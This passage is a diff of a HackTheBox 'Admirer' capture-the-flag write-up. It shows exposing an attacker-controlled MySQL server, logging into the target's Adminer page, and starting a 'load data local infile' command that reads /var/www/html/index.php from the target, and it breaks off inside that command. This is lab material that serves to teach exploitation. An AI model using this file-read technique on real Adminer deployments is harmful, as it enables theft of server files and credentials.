hsnckkgl/CaptureTheFlag_WriteUps/HackTheBox_Admirer.md

 Now we need to modify ```/etc/mysql``` to bind it to the database.
 Change ```bind-address   = 127.0.0.1``` with ```bind-address   = 0.0.0.0```

-According to the exploitation guide, I can login ```http://10.10.10.187/utility-scripts/adminer.php``` with my database's credentials.
+According to the exploitation guide, I can login ```http://10.10.10.187/utility-scripts/adminer.php``` with my own database's credentials.

 I try to login with my credentials.
 Yes, it works!

 Go to SQL Commands and try to execute this:
 ```
 load data local infile '/var/www/html/index.php'